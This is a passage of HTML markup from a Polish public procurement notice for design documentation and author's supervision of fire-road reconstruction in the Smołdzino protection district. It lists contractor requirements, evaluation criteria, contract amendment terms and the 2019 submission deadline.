dopuszcza łączenie uprawnień.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">W przypadku złożenia oferty łącznie na dwie części, Zamawiający będzie wymagał od Wykonawcy doświadczenia i dysponowania osobami dla potwierdzenia zdolności technicznych i zawodowych, wskazanymi dla poszczególnych części w pkt 1 oraz pkt 2.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) wykaz dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu (załącznik nr 3 do SIWZ),2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SIWZ); 3) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy (załącznik nr 4 do SIWZ).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Pełnomocnictwo w przypadku reprezentowania Wykonawcy przez pełnomocnika, a w przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia, którzy zobowiązani są do ustanowienia pełnomocnika - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Dokument należy złożyć w oryginale lub jego uwierzytelniony notarialnie odpis.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie projektanta</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany postanowień zawartej umowy mogą dotyczyć:1)	terminu realizacji w przypadku przedłużenia się procedur uzyskania decyzji administracyjnych, za które Wykonawca nie ponosi odpowiedzialności pomimo zachowania należytej staranności. Zmiana terminu wykonania przedmiotu umowy nie może przekroczyć czasu wymaganego do uzyskania decyzji administracyjnych oraz czasu niezbędnego do usunięcia skutków tych okoliczności.2)	zmian w zespole osób wykonujących zamówienie wykazanych przez Wykonawcę dla spełnienia warunku określonego w pkt 5.2.2 SIWZ w przypadku zaistnienia niezawinionych przez Wykonawcę zdarzeń losowych lub ustania więzi prawnych łączących go z nimi. W tych przypadkach Wykonawca zobowiązany jest do zgłoszenia do Zamawiającego i udokumentowania tych zdarzeń. Osoby, które wejdą w skład zespołu Wykonawcy muszą spełniać minimalne wymagania określone w pkt 5.2.2 SIWZ, Wykonawca udokumentuje spełnianie tych wymogów.3)	zmian w zespole osób wykonujących zamówienie wykazanych przez Wykonawcę w ramach kryteriów określonych w pkt 14.2 SIWZ dla poszczególnych części w przypadku zaistnienia niezawinionych przez Wykonawcę zdarzeń losowych tj. śmierć, ciężka choroba niepozwalająca na uczestniczenie w realizacji zamówienia. W tych przypadkach Wykonawca zobowiązany jest do zgłoszenia do Zamawiającego i udokumentowania tych zdarzeń. Osoby, które wejdą w skład zespołu Wykonawcy muszą spełniać co najmniej takie wymagania, jakie spełniały osoby, które będą zastąpione, a Wykonawca na etapie oceny ofert uzyskałby dzięki dysponowaniu tymi osobami taką samą liczbę punktów w kryterium oceny ofert.4)	zmian wysokości wynagrodzenia za nadzór autorski należnego Wykonawcy, w przypadku zmiany:a)	stawki podatku od towarów i usług,b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonego na podstawie przepisów ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne,jeżeli te zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.W tym przypadku ulegnie zmianie wynagrodzenie brutto Wykonawcy.Zmiana wysokości wynagrodzenia, nastąpi na wniosek Wykonawcy złożony do Zamawiającego 30 dni przed planowaną zgodnie z § 11 wzorów umów wypłatą wynagrodzenia. Wniosek winien zawierać szczegółowe wyliczenie kosztów wynagrodzenia, które uległy zmianie.d) zakresu przedmiotu zamówienia dot. pełnienia nadzoru autorskiego, w takim przypadku nie otrzyma wynagrodzenia za tę część zamówienia, która nie będzie realizowana oraz nie będzie rościł z tego tytułu roszczeń odszkodowawczych; 5)	zmiany w zakresie przedmiotu zamówienia dot. pełnienia nadzoru autorskiego w przypadku nie przystąpienia przez Zamawiającego do realizacji robót budowlanych z przyczyn niezależnych od Zamawiającego, w okresie ustawowo przewidzianym na wszczęcie prac na podstawie decyzji administracyjnych umożliwiających realizację robót - Wykonawca będzie zwolniony z obowiązku świadczenia usługi pełnienia nadzoru autorskiego nad robotami; w takim przypadku nie otrzyma wynagrodzenia za tę część zamówienia i nie będzie rościł z tego tytułu roszczeń odszkodowawczych,6)	zmiany w zakresie podwykonawstwa pod warunkiem pisemnego poinformowania Zamawiającego przez Wykonawcę o zamiarze wprowadzenia zmian i po uzyskaniu zgody Zamawiającego na wprowadzenie tych zmian. Zmiana albo rezygnacja z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 22a ust. 1 ustawy Pzp dopuszczalna jest pod warunkiem, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu wymaganym w trakcie postępowania o udzielenie zamówienia.2.	W przypadkach określonych w pkt 1 ppkt 1),2), 3), 4) lit. a-c, 6), Wykonawca zobowiązany jest do przekazania Zamawiającemu wniosku dotyczącego zmiany umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany. Zamawiający w terminie 5 dni roboczych od dnia otrzymania żądania zmiany, powiadomi Wykonawcę o akceptacji żądania zmiany umowy i terminie podpisania aneksu do umowy lub odpowiednio braku akceptacji zmiany. 3.	Zmiana postanowień zawartej umowy w przypadkach określonych w pkt 1 ppkt 1),2) 4) lit. a-c, 6) może nastąpić wyłącznie za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę, jako stanowiące podstawę do zmian umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zamówienia zgodnie z warunkami zawartymi w umowie.4.	W przypadku zmian określonych w pkt 1 ppkt 5) i w konsekwencji określonych w pkt 1 ppkt 4) lit. d zmiany nastąpią z inicjatywy Zamawiającego. Zamawiający powiadomi Wykonawcę w formie pisemnej o zaistniałym przypadku w terminie 10 dni od powzięcia decyzji o nieprzystąpieniu do realizacji robót. Zmiana nie wymaga aneksu do umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-06-10</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferty należy złożyć w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji techniczno-kosztorysowych i pełnienie nadzoru autorskiego nad realizacją robót zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 5.1 do SIWZ Część nr 1 dla robót drogowych: 1) zadanie nr 1 - Przebudowa drogi pożarowej nr 3 w Obwodzie Ochronnym Smołdzino, 2) zadanie nr 2 - Przebudowa drogi pożarowej nr 3A w Obwodzie Ochronnym Smołdzino, 3) zadanie nr 3 - Przebudowa drogi pożarowej nr 4 w Obwodzie Ochronnym Smołdzino,</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia obejmować będzie:1) działania poprzedzające opracowanie dokumentacji techniczno-kosztorysowej:a)	wykonanie niezbędnych pomiarów inwentaryzacyjnych oraz badań geotechnicznych,b)	opracowanie dokumentacji geotechnicznej,c)	uzyskanie, w razie potrzeby, dodatkowych danych i warunków technicznych oraz postanowień i uzgodnień od innych podmiotów i ewentualnie gestorów sieci,d)	opracowanie mapy sytuacyjno-wysokościowej do celów projektowych wraz z niezbędnymi uzgodnieniami,e)	opracowanie Karty Informacyjnej Przedsięwzięcia (w przypadku obowiązku jej sporządzenia),f)	przygotowanie i złożenie wniosków do właściwego urzędu gminy o wydanie decyzji o środowiskowych uwarunkowaniach na realizację inwestycji, decyzji o lokalizacji inwestycji celu publicznego,g)	w razie nałożenia obowiązku - sporządzenie raportu oddziaływania na środowisko,h)	wykonanie innych opracowań niezbędnych celem uzyskania decyzji o pozwoleniu na budowę,i)	wykonanie projektu koncepcyjnego przedstawiającego minimum 2 warianty rozwiązań - uzyskanie akceptacji Zamawiającego dla jednego z tych wariantów, a dla projektu koncepcyjnego wybranego przez Zamawiającego opracowanie projektu budowlanego,2)	opracowanie i uzgodnienie projektu budowlanego o charakterze projektu wykonawczego wchodzącego w skład dokumentacji techniczno-kosztorysowej oraz uzyskanie ostatecznej 